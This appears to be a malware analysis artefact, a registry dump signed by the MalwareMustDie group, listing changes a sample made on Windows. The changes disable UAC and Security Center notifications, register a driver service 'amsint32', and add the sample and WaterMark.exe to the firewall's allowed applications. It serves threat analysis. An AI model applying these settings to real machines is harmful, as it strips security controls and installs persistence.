HKLM\Software\Microsoft\Security Center\Svc\UpdatesDisableNotify    REG_DWORD   4   0x1
HKLM\Software\Microsoft\Security Center\UacDisableNotify    REG_DWORD   4   0x1
HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA    REG_DWORD   4   0x0
HKLM\System\CurrentControlSet\Services\amsint32\DisplayName REG_SZ  18  "amsint32"
HKLM\System\CurrentControlSet\Services\amsint32\Enum\0  REG_SZ  52  "Root\LEGACY_AMSINT32\0000"
HKLM\System\CurrentControlSet\Services\amsint32\Enum\Count  REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\amsint32\Enum\NextInstance   REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\amsint32\ErrorControl    REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\amsint32\ImagePath   REG_EXPAND_SZ   84  "C:\WINDOWS\system32\drivers\iurln.sys"
HKLM\System\CurrentControlSet\Services\amsint32\Security\Security   REG_BINARY  168 ?
HKLM\System\CurrentControlSet\Services\amsint32\Start   REG_DWORD   4   0x3
HKLM\System\CurrentControlSet\Services\amsint32\Type    REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\0    REG_SZ  64  "Root\LEGACY_IPFILTERDRIVER\0000"
HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\Count    REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\NextInstance REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Microsoft\WaterMark.exe  REG_SZ  114 "C:\Program Files\Microsoft\WaterMark.exe:*:Enabled:ipsec"
HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:%MALWARESAMPLE% REG_SZ  70  "C:\TEST\sample.exe:*:Enabled:ipsec"
HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications  REG_DWORD   4   0x1
HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions  REG_DWORD   4   0x0

----
#MalwareMustDie!
@unixfreaxjp